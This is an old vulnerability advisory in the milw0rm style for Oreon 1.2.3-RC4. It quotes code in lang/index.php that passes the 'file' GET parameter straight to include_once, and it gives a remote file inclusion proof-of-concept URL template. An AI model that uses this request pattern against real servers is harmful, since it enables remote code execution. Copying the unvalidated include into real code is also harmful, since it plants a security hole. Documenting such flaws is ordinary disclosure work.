19 lines
No EOL
1.1 KiB
Text
19 lines
No EOL
1.1 KiB
Text
------------------------------------------------------------------------------------------------------------------------
|
|
Script:oreon-1.2.3-RC4
|
|
Downlaoad:http://www.oreon-project.org/
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Author:Dr Max Virus
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Bug in (lang/index.php)
|
|
Vul Code;
|
|
if (isset($_GET["file"])){
|
|
include_once($_GET["file"]);
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
POC:
|
|
http://[target]/[path]/lang/index.php?file=[Bad Code]
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
|
|
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
|
|
------------------------------------------------------------------------------------------------------------------------
|
|
|
|
# milw0rm.com [2007-01-17] |